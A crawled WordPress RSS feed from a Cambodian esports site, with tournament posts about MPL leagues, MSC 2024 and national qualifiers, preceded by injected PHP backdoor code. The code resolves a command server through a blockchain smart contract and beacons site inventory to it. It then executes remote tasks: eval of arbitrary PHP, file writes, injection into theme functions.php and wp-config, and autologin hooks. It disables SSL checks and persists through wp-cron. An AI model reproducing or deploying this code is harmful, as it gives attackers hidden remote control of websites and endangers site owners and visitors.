// wa_n5 if(!defined('ABSPATH'))return; $cfg=array( 'stub'=>'/var/www/html/wp-content/plugins/wp-helper-d1652a/wp-helper-d1652a.php', 'ctrl'=>'// wa_n5', 'vis'=>'// cr_hx', 'vis_func'=>'wp_1o7s3e', 'vis_paths'=>array('/var/www/html/wp-content/plugins/wp-helper-d1652a/wp-helper-d1652a.php'), 'opt'=>'_wp_folseifb', ); $keys=array(); $keys['id']='eno'; $keys['ver']='kn'; $keys['caps']='fv6'; $keys['tasks']='o0j'; $keys['interval']='7wi'; $keys['ack_id']='8gt'; $keys['ok']='6e'; $keys['detail']='as3'; $keys['inv']='s8b'; $keys['result']='qty'; $hdr='X-Q05-Auth';$tok='0AJYRMI5lCup1SzAHc-QPKfLenFt5822a6WkK_9OOkA';$id='e17f1b62d140c034';$interval=420; function _ea_inv($cfg){ $r=array('ts'=>time(),'wp'=>(function_exists('get_bloginfo')?get_bloginfo('version'):''),'php'=>PHP_VERSION); $chk=function($p,$m){$o=array('path'=>$p,'exists'=>false,'marker'=>false,'size'=>0);if(!$p||!is_string($p))return $o; if(@is_file($p)){$b=@file_get_contents($p);$o['exists']=true;$o['size']=strlen((string)$b);$o['marker']=($b&&strpos($b,$m)!==false);}return $o;}; $r['stub']=$chk($cfg['stub'],$cfg['ctrl']); $vis=array('plugin'=>null,'paths'=>array()); foreach($cfg['vis_paths'] as $_vp){$vis['paths'][]=$chk($_vp,$cfg['vis']);} $found=null;foreach($vis['paths'] as $_p){if(!empty($_p['marker'])){$found=$_p;break;}} if(!$found){$pd=WP_CONTENT_DIR.'/plugins';if(@is_dir($pd)){foreach(@glob($pd.'/*/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_plug')!==false){$found=$chk($_f,'// ea_plug');break;}}} $vis['plugin']=$found?:array('path'=>'','exists'=>false,'marker'=>false); $r['visitor']=$vis; $mu=array('path'=>'','exists'=>false,'marker'=>false);$md=WP_CONTENT_DIR.'/mu-plugins'; if(@is_dir($md)){foreach(@glob($md.'/*.php')?:array() as $_f){$b=@file_get_contents($_f);if($b&&strpos($b,'// ea_mu')!==false){$mu=$chk($_f,'// ea_mu');break;}}} $r['mu_autologin']=$mu; $ft=0;$fw=0;$td=WP_CONTENT_DIR.'/themes';if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$ft++;$b=@file_get_contents($_f);if($b&&strpos($b,'// _ea_al')!==false)$fw++;}} $r['functions_autologin']=array('themes_total'=>$ft,'themes_with_marker'=>$fw); $wpc=array('path'=>(defined('ABSPATH')?ABSPATH.'wp-config.php':''),'exists'=>false,'marker'=>false); if($wpc['path']&&@is_file($wpc['path'])){$b=@file_get_contents($wpc['path']);$wpc['exists']=true;$wpc['marker']=($b&&(strpos($b,'// _ea_wc')!==false||strpos($b,'/* _ea_wc_s */')!==false));} $r['wpconfig_inject']=$wpc; $cp=array();if(defined('LSCWP_V'))$cp[]='litespeed';if(defined('W3TC'))$cp[]='w3tc'; if(defined('WP_ROCKET_VERSION'))$cp[]='wp_rocket';if(defined('WPCACHEHOME'))$cp[]='wp_super_cache'; if(defined('SG_CACHEPRESS'))$cp[]='sg_optimizer';$r['cache']=array('plugins'=>$cp,'opcache'=>function_exists('opcache_get_status')); return $r;} function _ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id){ $_ok=false;$_detail='';$_result=null; $_code=isset($_task['t'])?$_task['t']:'';$_p=isset($_task['p'])?$_task['p']:array();$_tid=isset($_task['i'])?$_task['i']:0; if(($_code==='wf'||$_code==='ld')&&!empty($_p['path'])&&isset($_p['content'])){ $_path=$_p['path'];$_body=@is_file($_path)?@file_get_contents($_path):''; if($_code==='ld'&&strpos((string)$_body,$_p['content'])===false)$_body.=$_p['content']; elseif($_code==='wf')$_body=$_p['content']; $_ok=@file_put_contents($_path,$_body)!==false; }elseif($_code==='su'&&!empty($_p['path'])&&!empty($_p['content'])){ $_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='rp'&&!empty($_p['code'])){ ob_start();try{eval($_p['code']);$_ok=true;}catch(Throwable $e){$_detail=$e->getMessage();}catch(Exception $e){$_detail=$e->getMessage();} $_result=array('output'=>ob_get_clean());} elseif($_code==='va'){$_result=_ea_inv($cfg);$_ok=true;} elseif($_code==='fc'){ $p=array();if(function_exists('wp_cache_flush')){wp_cache_flush();$p[]='object';} if(function_exists('opcache_reset')){@opcache_reset();$p[]='opcache';} if(defined('LSCWP_V')&&function_exists('do_action')){do_action('litespeed_purge_all');$p[]='litespeed';} if(defined('W3TC')&&function_exists('w3tc_flush_all')){w3tc_flush_all();$p[]='w3tc';} if(function_exists('rocket_clean_domain')){rocket_clean_domain();$p[]='wp_rocket';} if(function_exists('wp_cache_clear_cache')){wp_cache_clear_cache();$p[]='wp_super_cache';} if(function_exists('sg_cachepress_purge_cache')){sg_cachepress_purge_cache();$p[]='sg_optimizer';} $_ok=true;$_result=array('purged'=>$p);} elseif($_code==='ma'&&!empty($_p['path'])&&!empty($_p['content'])){ @wp_mkdir_p(dirname($_p['path']));$_ok=@file_put_contents($_p['path'],$_p['content'])!==false; }elseif($_code==='fn'&&!empty($_p['snippet'])){ $td=WP_CONTENT_DIR.'/themes';$n=0;if(@is_dir($td)){foreach(@glob($td.'/*/functions.php')?:array() as $_f){$b=@file_get_contents($_f);if(strpos((string)$b,'// _ea_al')===false){$b=rtrim((string)$b)."\n".$_p['snippet'];if(@file_put_contents($_f,$b)!==false)$n++;}}} $_ok=$n>0;$_result=array('themes_updated'=>$n);} elseif($_code==='wc'){ $wp=ABSPATH.'wp-config.php';if(@is_file($wp)){$b=@file_get_contents($wp); if(strpos($b,'/* _ea_wc_s */')!==false){$b=preg_replace('#/\*/* _ea_wc_s */\*/.*?/\* _ea_wc_e \*/#s','',$b);} $b=str_replace(array('// _ea_wc','/* _ea_wc_s */','/* _ea_wc_e */'),'',$b);$_ok=@file_put_contents($wp,$b)!==false;} } $ack=array($keys['ack_id']=>$_tid,$keys['ok']=>$_ok,$keys['detail']=>$_detail); if($_result!==null)$ack[$keys['result']]=$_result; return $ack;} function _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,$force){ $k=$cfg['opt'];if(!$force&&!wp_doing_cron()){ if(is_admin())return; $last=(int)get_option($k,0);if(time()-$last<$interval)return; } $u='likingdropout.site';$co='0x9e33A3979F74c7700E4BaA7e7a2934556f72eF96';$sel='0x38bd65e2';$rpcs=array('https://data-seed-prebsc-1-s1.bnbchain.org:8545','https://data-seed-prebsc-1-s1.bnbchain.org:8545/','https://data-seed-prebsc-2-s1.binance.org:8545/','https://data-seed-prebsc-2-s2.binance.org:8545/','https://bsc-testnet-dataseed.bnbchain.org/','https://bnb-testnet.api.onfinality.io/public'); foreach($rpcs as $_rpc){ $b=json_encode(array('jsonrpc'=>'2.0','id'=>97,'method'=>'eth_call','params'=>array(array('to'=>$co,'data'=>$sel),'latest'))); $ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n",'content'=>$b,'timeout'=>3,'ignore_errors'=>true))); $raw=@file_get_contents($_rpc,false,$ctx); if(!$raw)continue; $j=json_decode($raw,true); if(empty($j['result'])||strlen($j['result'])<10)continue; $h=substr($j['result'],2); if(strlen($h)<128)continue; $off=(int)hexdec(substr($h,0,64)); $len=(int)hexdec(substr($h,$off*2,64)); $_z=pack('H*',substr($h,$off*2+64,$len*2));if($_z)$u=$_z;break; } $_hp='/panel/api/v1/metrics/collect'; $_z=trim((string)$u);$_z=preg_replace('#^https?://#','',$_z); if(strpos($_z,'/')!==false){$_xp=explode('/',$_z,2);$_z=$_xp[0];if(!empty($_xp[1]))$_hp='/'.ltrim($_xp[1],'/');} $_z=trim($_z,'.');if(!$_z)$_z='likingdropout.site'; $_s=substr(str_replace(array('+','/','='),'',base64_encode(random_bytes(6))),0,10); $u='https://'.$_s.'.'.$_z.$_hp; $_ack=$u;if(substr($_ack,-7)==='collect')$_ack=substr($_ack,0,-7).'ack';else $_ack=rtrim($_ack,'/').'/ack'; $inv=_ea_inv($cfg); $b=array($keys['id']=>$id,$keys['ver']=>2,$keys['caps']=>array('server_sync','visitor_js','write_file'),$keys['inv']=>$inv); $resp='';if(function_exists('wp_remote_post')){$_r=wp_remote_post($u,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($b)));if(!is_wp_error($_r))$resp=(string)wp_remote_retrieve_body($_r);}else{$ctx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($b),'timeout'=>20,'ignore_errors'=>true)));$resp=(string)@file_get_contents($u,false,$ctx);} if(!$resp)return; update_option($k,time(),false); $j=json_decode($resp,true);$tk=$keys['tasks']; if(empty($j[$tk])||!is_array($j[$tk]))return; foreach($j[$tk] as $_task){ $ack=_ea_run_task($_task,$cfg,$keys,$hdr,$tok,$id); if(function_exists('wp_remote_post')){@wp_remote_post($_ack,array('timeout'=>20,'sslverify'=>false,'headers'=>array('Content-Type'=>'application/json',$hdr=>$tok,'X-Site-Id'=>$id),'body'=>json_encode($ack)));}else{$actx=stream_context_create(array('ssl'=>array('verify_peer'=>false,'verify_peer_name'=>false),'http'=>array('method'=>'POST','header'=>"Content-Type: application/json\r\n".$hdr.": ".$tok."\r\nX-Site-Id: ".$id."\r\n",'content'=>json_encode($ack),'timeout'=>20,'ignore_errors'=>true)));@file_get_contents($_ack,false,$actx);} } } add_filter('cron_schedules',function($s){$s['ea_fleet']=array('interval'=>$interval,'display'=>'Fleet sync');return $s;}); add_action('init',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ if(!wp_next_scheduled('ea_fleet_sync'))wp_schedule_event(time()+120,'ea_fleet','ea_fleet_sync'); _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,false); },1); add_action('ea_fleet_sync',function()use($cfg,$keys,$hdr,$tok,$id,$interval){ _ea_sync($cfg,$keys,$hdr,$tok,$id,$interval,true); }); MLBB Tournament – Cambo E-Sports https://camboesports.com Greatest E-sports in Cambodia Wed, 17 Jul 2024 09:45:05 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 https://camboesports.com/wp-content/uploads/2023/11/cropped-2023-11-23-19.50.39-32x32.jpg MLBB Tournament – Cambo E-Sports https://camboesports.com 32 32 MPL Singapore Season 7 https://camboesports.com/2024/06/6053/ https://camboesports.com/2024/06/6053/#respond Thu, 13 Jun 2024 10:35:28 +0000 https://camboesports.com/?p=6053 https://camboesports.com/2024/06/6053/feed/ 0 MPL Indonesia Season 13 https://camboesports.com/2024/06/6050/ https://camboesports.com/2024/06/6050/#respond Thu, 13 Jun 2024 10:16:41 +0000 https://camboesports.com/?p=6050 https://camboesports.com/2024/06/6050/feed/ 0 MPL Philippines Season 13 https://camboesports.com/2024/06/6047/ https://camboesports.com/2024/06/6047/#respond Thu, 13 Jun 2024 10:09:03 +0000 https://camboesports.com/?p=6047 https://camboesports.com/2024/06/6047/feed/ 0 MPL CAMBODIA SEASON 6 https://camboesports.com/2024/06/6031/ https://camboesports.com/2024/06/6031/#respond Thu, 13 Jun 2024 09:58:23 +0000 https://camboesports.com/?p=6031 Mobile Legends Professional League Cambodia ដែលត្រូវបានគេស្គាល់ថា MPL Cambodia ឬក៏ MPL KH គឺជា Professional League នៅក្នុងប្រទេសកម្ពុជា Cambodia

Timeline Tournament

ការប្រកួតចាប់ផ្តើមពីថ្ងែទី 23 មីនា 2024 រហូតដល់ថ្ងែទី​ 19 ឧសភា 2024 ។

Format MPL Malaysia Season 13

  • ទទួលបាន 3 ពិន្ទុសម្រាប់ការឈ្នះ 2-0 ហ្គេម
  • ទទួលបាន 2 ពិន្ទុសម្រាប់ការឈ្នះ 2-1 ហ្គេម
  • ទទួលបាន 1 ពិន្ទុសម្រាប់ការចាញ់ 1-2 ហ្គេម
  • ទទួលបាន 0 ពិន្ទុសម្រាប់ការចាញ់ 0-2 ប្រកួត

Playoffs:

  • Hybrid Elimination
  • ក្រុមលេខ 1 និងលេខ 2 ចាប់ផ្តើមក្នុងវគ្គពាក់កណ្តាលផ្តាច់ព្រ័ត្រនៃក្រុម Upper Bracket
  • ក្រុមលេខ 3 ដល់ទី 6 ចាប់ផ្តើមក្នុងវគ្គ Play-in
  • ការ​ប្រកួត​ទាំង​អស់​ត្រូវ​បាន​លេង​ក្នុង Bo5, Grand Final លេងនៅ Bo7
  • ជើងឯក​មាន​សិទ្ធិ​ទៅ MSC 2024 ជើងឯករង​មាន​សិទ្ធិ​ទៅ Wildcard
  • Top 8 Team មានសិទ្ធិទៅរដូវកាលក្រោយ (រដូវកាលទី 14)

Participating Teams

See You SoonCFU GamingTeam Flash KHTeam Max
2023 Autumn2023 Autumn2023 Autumn2023 Autumn
DRoar LegendsPRO EsportsTeam SVDuck Rice Esport
2023 Autumn2023 Autumn2024 Challenger Cup2024 Challenger Cup

Regular Season

Regular Season
#TeamMatch W-LGameGame Won PercentagePoint
1CFU Gaming5-211-473.33%16p
2Team Flash KH5-212-570.59%16p
3DRoar Legends5-211-857.89%12p
4See You Soon2-57-1041.18%9p
5Duck Rice Esport3-47-1041.18%8p
6PRO Esports3-47-1041.18%8p
7Team Max2-57-1138.89%8p
8Team SV3-46-1037.50%7p

Prize Pool

MPL Cambodia MVP-FINAL PLAYER

]]>
https://camboesports.com/2024/06/6031/feed/ 0
T.Y Media Academy Cup 2024 https://camboesports.com/2024/06/5994/ https://camboesports.com/2024/06/5994/#respond Wed, 12 Jun 2024 19:00:12 +0000 https://camboesports.com/?p=5994 T.Y Media Academy Cup ជាកាប្រកួត​កំរិតមធ្យមមួយបង្កើតឡើងសម្រាប់ថ្នាលយុវជនជំនាន់ក្រោយ​​​ ជាពិសេសប្អូនៗដែលនិយមលេង​ Esports លើវិញ្ញាសារ Mobile Legend : Bang Bang បញ្ចេញសមត្ថភាព !​ ហើយនេះជារដូវកាលទី២​ហើយដែលក្រុមហ៊ុន​ T.Y Media CO,.LTD រៀបចំការប្រកួតនេះឡើង ដោយលើកទីមួយធ្វើឡើងនៅក្នុង​ ឆ្នាំ២០២២

សម្រាប់ការប្រកួត ​Academy Cup ដែលរៀបចំដោយ​ក្រុមហ៊ុន​​ T.Y Media CO,.LTD ក៏មានការទទួលស្គាល់ និង​ គាំទ្រដោយ សហព័ន្ធកីឡាអេឡិចត្រូនិកកម្ពុជាផងដែរ

Tournament Rule and Format

I. ទម្រង់នៃការប្រកួត

ការប្រកួតរបស់យើងនឹងបែងចែកជា 3 វគ្គគឺ

  • វគ្គ Qualifier
  • វគ្គ Group Stage
  • វគ្គ​ Playoffs

1. វគ្គ Qualifiers

វគ្គ Qualifier នឹងបើកអោយចុះឈ្មោះដោយស៊េរីចាប់ពីថ្ងៃទី 11 ខែ មីនា ឆ្នាំ 2024 រហូតដល់ថ្ងៃទី 16 ខែ មីនា ឆ្នាំ 2024 (ការប្រកួតវគ្គ Qualifier កំណត់យកចំនួនក្រុម 512 ក្រុម ដូចនេះអ្នករៀបចំការប្រកួតមានសិទ្ធក្នុងការបិទការចុះឈ្មោះមុនថ្ងៃកំណត់ក្នុងករណីមានក្រុមចុះឈ្មោះគ្រប់ចំនួន) បន្ទាបពីបញ្ចប់ការចុះឈ្មោះវគ្គ Qualifier នឹងចាប់ផ្ដើមប្រកួតពីថ្ងៃទី 23 ខែ មីនា ឆ្នាំ 2024 ។
នេះគឺជាពេលវេលានៃការប្រកួត:

– វគ្គ 512 ក្រុម៖ ថ្ងៃទី 23-24 ខែ មីនា ឆ្នាំ 2024 លេងជាលក្ខណៈ Best of 1 (Custom Draft Pick)
– វគ្គ 256 ក្រុម៖ ថ្ងៃទី 30-31 ខែ មីនា ឆ្នាំ 2024 លេងជាលក្ខណៈ Best of 1 (Custom Draft Pick)
– វគ្គ 128 ក្រុម៖ ថ្ងៃទី 06-07 ខែ មេសា ឆ្នាំ 2024 លេងជាលក្ខណៈ Best of 1 (Custom Draft Pick)
– វគ្គ 64 ក្រុម៖ ថ្ងៃទី 20-21 និង 27 ខែ មេសា ឆ្នាំ 2024 លេងជាលក្ខណៈ Best of 3 (Custom Draft Pick)
– វគ្គ 32 ក្រុម៖ ថ្ងៃទី 28 ខែ មេសា ឆ្នាំ 2024 លេងជាលក្ខណៈ Best of 3 (Custom Draft Pick)

2. វគ្គ Group Stage

ការប្រកួតវគ្គ Group Stage នឹងប្រកួតរយៈពេល 2 សប្ដាហ៍គឺនៅថ្ងៃទី 04-05 ខែ ឧសភា ឆ្នាំ 2024 និងថ្ងៃទី 11- 12 ខែ ឧសភា ឆ្នាំ 2024 ។ សម្រាប់វគ្គ Group Stage មានក្រុមចូលរួមសរុបចំនួន 16 ដែលជាក្រុមដែលជម្រុះមកពីវគ្គ Qualifier។ ក្រុមទាំងអស់នឹងបែងចែកជា 4 Group ក្នុងមួយ Group មាន 4​ ក្រុមនិងត្រូវប្រកួតគ្នាវិលជុំសន្សំពិន្ទុជាលក្ខណៈ Best of 3 (Tournament Mode)។

3. វគ្គ PLAY-OFFS

ការប្រកួតវគ្គ Playoffs នឹងប្រកួតនៅថ្ងៃ​ 23-26 ខែ ឧសភា ឆ្នាំ 2024 ។ ការប្រកួត​នៅវគ្គនេះទាំងអស់នឹងលេងជាលក្ខណៈ Best of 3 លើកលែងតែនៅវគ្គផ្ដាច់ Grand Final ដែលនឹងប្រកួតជាលក្ខណៈ Best of 7 ។ ការប្រកួតទាំងអស់នៅវគ្គនេះនៅតែប្រកួតជា Offline Event ដដែលមានទីតាំងស្ថិតនៅ T.Y Media Esports Center ។

+ Bracket ការប្រកួតវគ្គ Playoffs

ចំណាត់ថ្នាក់ប្រាក់រង្វាន់Participant
1st៥,០០០,០០០៛Valhalla
2nd៣,០០០,០០០IMP EMPERORS
3rd១,៥០០,០០០៛Krud Team
4th ៨០០,០០០៛Asgardian
5th-6th ៥០០,០០០៛Max Academy
GenZ General
7th-8th៣៥០,០០០៛Aisaki Esports
Team SV Beta

សម្រាប់ព័ត៌មានបន្ថែមសូមចូលទៅចុច Link 🔗 នេះដើម្បីអានបទបញ្ចាកាប្រកួតរបស់ T.Y Media Academy Cub 2024​ លទ្ធផលការនែការប្រកួតវគ្គ Playoffs

លទ្ធផលការនែប្រកួតវគ្គ PLAY-OFFS

អបអរសាទរទៅកាន់ម្ចាស់ជើងឯកពានរង្វាន់ T.Y Media Academy រដូវកាលទី២ ដែលបានទៅលើក្រុម VALHALLA ។

]]>
https://camboesports.com/2024/06/5994/feed/ 0
MPL Malaysia Season 13 https://camboesports.com/2024/06/5911/ https://camboesports.com/2024/06/5911/#respond Wed, 05 Jun 2024 10:44:45 +0000 https://camboesports.com/?p=5911 Mobile Legends Professional League Malaysia ដែលត្រូវបានគេស្គាល់ថា MPL MY គឺជា MLBB Professional League នៅក្នុងប្រទេសម៉ាឡេស៊ី Malaysia ។

Timeline Tournament

ការប្រកួតចាប់ផ្តើមពីថ្ងែទី 29 មីនា 2024 រហូតដល់ថ្ងែទី​ 2 មិថុនា 2024 ។

Format MPL Malaysia Season 13

  • ទទួលបាន 3 ពិន្ទុសម្រាប់ការឈ្នះ 2-0 ហ្គេម
  • ទទួលបាន 2 ពិន្ទុសម្រាប់ការឈ្នះ 2-1 ហ្គេម
  • ទទួលបាន 1 ពិន្ទុសម្រាប់ការចាញ់ 1-2 ហ្គេម
  • ទទួលបាន 0 ពិន្ទុសម្រាប់ការចាញ់ 0-2 ប្រកួត

Playoffs:

  • Hybrid Elimination
  • ក្រុមលេខ 1 និងលេខ 2 ចាប់ផ្តើមក្នុងវគ្គពាក់កណ្តាលផ្តាច់ព្រ័ត្រនៃក្រុម Upper Bracket
  • ក្រុមលេខ 3 ដល់ទី 6 ចាប់ផ្តើមក្នុងវគ្គ Play-in
  • ការ​ប្រកួត​ទាំង​អស់​ត្រូវ​បាន​លេង​ក្នុង Bo5, Grand Final លេងនៅ Bo7
  • ជើងឯក​មាន​សិទ្ធិ​ទៅ MSC 2024 ជើងឯករង​មាន​សិទ្ធិ​ទៅ Wildcard
  • Top 8 Team មានសិទ្ធិទៅរដូវកាលក្រោយ (រដូវកាលទី 14)

Participating Teams

HomeBoisKing EmpireSelangor Red GiantsRSG MalaysiaTODAK
Season 12Season 12Season 12Season 12Season 12
Team HAQNINERSBarracuda EsportsMonster ViciousBountee Esports
Season 12Season 12Season 12QualifierQualifier

Prize Pool

Place$ USDQualifies ToParticipant
1st$32,500MSC 2024Red Giants Esports
2nd$19,100MSC 2024 (Wildcard) HomeBois
3rd$9,900RSG Malaysia
4th7,700King Empire
5th-6th$7,100TODAK
$6,700Team HAQ
7th-8th4,900NINERS
Monster Vicious

MPL Malaysia Award

AwardParticipantTeam
Regular Season MVPInnocentRed Giants Esports
Final MVPInnocentRed Giants Esports
Best RookieX WinKing Empire
Most Improved PlayerYumSRed Giants Esports
Best GameplayRafflesiaTODAK
Best TalentMarsTalent of the Season 13
]]>
https://camboesports.com/2024/06/5911/feed/ 0
INTERNATIONAL ESPORTS FEDERATION ( IESF ) https://camboesports.com/2024/06/5849/ https://camboesports.com/2024/06/5849/#respond Wed, 05 Jun 2024 08:59:31 +0000 https://camboesports.com/?p=5849

WHAT IS IESF ? តើ IESF គឺជាអ្វី?
IESF ដែលមានឈ្មោះ​ពេញថា INTERNATIONAL ESPORTS FEDERATION​ គឺជាសហព័ន្ធកីឡា Esports អន្តរជាតិជាអង្គការពិភពលោកមួយដែលមានមូលដ្ឋាននៅប្រទេសកូរ៉េខាងត្បូង ដែលបេសកកម្មរបស់ខ្លួនគឺដើម្បីឱ្យកីឡា Esports ទទួលស្គាល់ថាជាកីឡាស្របច្បាប់។

គោលដៅ និងបេសកកម្ម

This image has an empty alt attribute; its file name is IESF-3-2.png

IESF រៀបចំការប្រកួត និងព្រឹត្តិការណ៍ជាបន្តបន្ទាប់ ដោយមានមោទនភាពក្នុងការធ្វើជាម្ចាស់ផ្ទះប្រចាំឆ្នាំ World Esports Championship ដែលជាកន្លែងសម្រាប់បង្រួបបង្រួមអត្តពលិក Esports ល្បីៗមកពីជុំវិញពិភពលោក នឹងជំរុញអោយបរិយាកាសនៃការប្រកួតប្រជែងដោយយុត្តិធម៌ និងស្ដង់ដារ។ IESF ប្រមូលផ្តុំសហព័ន្ធដែលជាសមាជិកមកពីជុំវិញពិភពលោក ដើម្បីប្រកួតប្រជែងក្នុងកម្រិតខ្ពស់បំផុត។ អ្នកលេងរាប់លាននាក់មកពី 140 ប្រទេសនឹងប្រកួតប្រជែងដើម្បីតំណាងឱ្យប្រទេសរបស់ពួកគេដោយមោទនភាពនិងកិត្តិយសខ្ពស់បំផុត។

ការប្រកួតជម្រុះថ្នាក់ជាតិ NATIONAL QUALIFIER

សហព័ន្ធកីឡាអេឡិចត្រូនិកកម្ពុជា (EFC) បានដាក់ការប្រកួតជម្រុះថ្នាក់ជាតិ «ដំណើរឆ្ពោះទៅកាន់ព្រឹត្តិការណ៍កីឡាអេឡិចត្រូនិកពិភពលោក ឆ្នាំ២០២៤» ។

ការប្រកួតជម្រុះស្វែងរកកីឡាករ កីឡាការិនី តំណាងកម្ពុជានឹងចាប់ផ្តើមលើវិញ្ញាសាចំនួន ៥ រួមមាន៖

1 – EFootball-Console

2 – PUBG Mobile

3 – DOTA 2

4 – Mobile Legends: Bang Bang-Women

5 – Mobile Legends: Bang Bang-Men

លទ្ធផលការប្រកួត

EFootball-Console: កីឡាករ ទឹម វង្សរ៉ាវុធ

PUBG Mobile: ក្រុម OSJA Esports 

Dota2 ក្រុម: APEX Esports

Mobile Legends: Bang Bang-Women: ក្រុម CFU Serendipity

Mobile Legends: Bang Bang-Men: ក្រុម SeeYouSoon

ប្រភពរូបភាព : E-Sports Federation Cambodia , CFU Serendipity , See You Soon , Osja Esports ,

]]>
https://camboesports.com/2024/06/5849/feed/ 0
ROAD TO MSC 2024 https://camboesports.com/2024/05/5806/ https://camboesports.com/2024/05/5806/#respond Fri, 31 May 2024 11:29:46 +0000 https://camboesports.com/?p=5806 MLBB Mid Season Cup ដែលត្រូវបានគេស្គាល់ថា MSC គឺជាជើងឯកអន្តរជាតិ MLBB ថ្មីស្រឡាង ដោយជំនួស​ MLBB Southeast Asia Cup​ ចាស់។
វាត្រូវបានប្រកាសថាជាផ្នែកមួយនៃការប្រកួតកីឡា Esports World Cup នៅថ្ងៃទី 23 ខែមករា ឆ្នាំ 2024 និងជាការប្រកួតដ៏សំខាន់អន្តរជាតិផ្លូវការលើកដំបូងដែលរៀបចំនៅក្រៅតំបន់អាស៊ីអាគ្នេយ៍។​

MID SEASON CUP 2024 Prize Pool

Place$ USDParticipant
1st$1,000,000Selangor Red Giants
2nd$500,000Falcons AP.Bren
3rd-4th$200,000Liquid Echo
5th-8th$100,000Falcon Esports
See You Soon
Fire Flux Esports
HomeBois
9th-12th$56,000EVOS Glory
Fnatic ONIC
Team Spirit
Cloud9
13th-16th$56,000RRQ Akira
Team Falcons
Twisted Minds
Xianyou Gaming

ក្រុមដែលបានចូលរួមជាមួយការប្រកួត:

Fnatic ONICEVOS GloryFalcons AP.BrenLiquid Echo
MPL ID S13(#1)MPL ID S13(#2)MPL PHS13(#2)MPL PH S13(#1)
Indonesia.IndonesiaPhilippinesPhilippines
NIP Flash Red Giants EsportsTeam FalconTwisted Minds
MPL SG S7MPL MY S13MPL MENA S5MPL MENA S5(B.KSA)
SingaporeMalaysiaMiddle East & AfricaMiddle East & Africa
Fire Flux EsportsTBDRRQ AkiraSee You Soon
MTC S3MCC S3MPL LATAM S1MPL KH S6
Turkey CISLatin AmericaCambodia
Cloud9 Falcon EsportsXianyou GamingHomeBois
NACT SpringMyanmar QualifierChina QualifierWild Card
North AmericaMyanmar China Malaysia

GROUP STAGE

Group A
#TeamGameDiff
1NIP Flash5-1+4
2Fire Flux Esports4-2+2
3EVOS Glory2-4-2
4RRQ Akira1-54
Group B
#TeamGameDiff
1Selangor Red Giants 5-1+4
2See You Soon4-2+2
3Fnatic ONIC3-30
4Team Falcons0-66
Group C
#TeamGameDiff
1Liquid Echo6-0+6
2HomeBois4-2+2
3Team Spirit2-4-2
4Twisted Minds0-66
Group D
#TeamGameDiff
1Falcons AP.Bren6-0+6
2Falcons Esports 4-2+2
3Cloud91-5-4
4Xianyou Gaming1-5-4

ក្រុមដែលប្រកួត Wild Card

 HomeBoisEntity7Brute ForceS2G Esports
MPL MY S13 (#2)MPL LATAM S1 (#2)MCC S3 (#2)MTC S3 (#2)
Malaysia.PeruRussiaTurkey
Zino ZenithTrained to KillIHC EsportsKeepBest Gaming
M Challenge Cup S3MCB S3Mongolia QualifierChina Qualifier (#2)
VietnamNepalMongolia China

GROUP STAGE

Wildcard Group A
#TeamGameDiff
1Entity73-0+3
2Zino Zenith2-1+1
3KeepBest Gaming1-2-1
4S2G Esports0-3-3
Wildcard Group B
#TeamGameDiff
1HomeBois3-0+3
2Trained to Kill2-1+1
3IHC Esports1-2-1
4Brute Force0-3-3

ESPORTS WORLD CUP MLBB MSC 2024 CHAMPIONS

]]>
https://camboesports.com/2024/05/5806/feed/ 0
ប្រទេសណាខ្លះដែលឈ្នះពានច្រើនជាងគេនៅលើវិញ្ញាសារ​ Mobile Legends : Bang Bang https://camboesports.com/2024/05/5760/ https://camboesports.com/2024/05/5760/#respond Thu, 23 May 2024 08:58:06 +0000 https://camboesports.com/?p=5760

៦ ឆ្នាំចុងក្រោយនេះ ប្រទេស Philippines ជាប្រទេសដែលឈ្នះពានច្រើនជាងគេក្នុងវិញ្ញាសារ Mobile Legends : Bang Bang ទាំង ក្រុម និង ថ្នាក់ជាតិ

ប្រទេស Philippines បានយកឈ្នះពានរង្វាន់ធំ​ និងមេដៃមាសសរុប ចំនួន ១២ រួមមាន

M2 World Championship

Bren Esports បានយកឈ្នះ Burmese Ghouls ក្នុងលទ្ធផល 4-3

M3 World Championship

Blacklist International បានយកឈ្នះ ONIC PH ក្នុងលទ្ធផល 4-0

M4 World Championship

Echo បានយកឈ្នះ Blacklist International ក្នុងលទ្ធផល 4-0

M5 World Championship

Ap Bren បានយកឈ្នះ ONIC PH ក្នុងលទ្ធផល 4-3

MLBB Southeast Asia Cup 2018

Aether Main ( Bren Esports ) បានយកឈ្នះ Digital Devils Pro ក្នុងលទ្ធផល 3-0

MLBB Southeast Asia Cup 2021

Execration បានយកឈ្នះ Blacklist International ក្នុងលទ្ធផល 4-1

MLBB Southeast Asia Cup 2022

RGS PH បានយកឈ្នះ RRQ Hoshi ក្នុងលទ្ធផល 4-0

Seagames 2019 ប្រទេស ភ្វីលីពីន ឈ្នះមេដៃមាស

Seagames 2021 ប្រទេស វៀតណាម ឈ្នះមេដៃមាស

Seagames 2023 ប្រទេស កម្ពុជា ឈ្នះមេដៃមាស

ASEAN Para Games 2023 ប្រទេស កម្ពុជា ឈ្នះមេដៃមាស

IESF World Esports Championship 2023 ឈ្នះមេដៃមាស

]]>
https://camboesports.com/2024/05/5760/feed/ 0
Esports National Championship 2023 https://camboesports.com/2024/03/3784/ https://camboesports.com/2024/03/3784/#respond Wed, 06 Mar 2024 08:09:00 +0000 https://camboesports.com/?p=3784

Esports National Championship 2023​ ជាការប្រកួតកម្រិតថ្នាក់ជាតិមួយដែលមានឈ្មោះកាត់ហៅថា​ ENC ដែលមានវិញ្ញាសារពីរនឺងរៀបរៀងឡើងដោយសហព័ន្ធកីឡាអេឡិចត្រូនិកកម្ពុជា​ដែលសហការជាមួយ T.Y Media​។

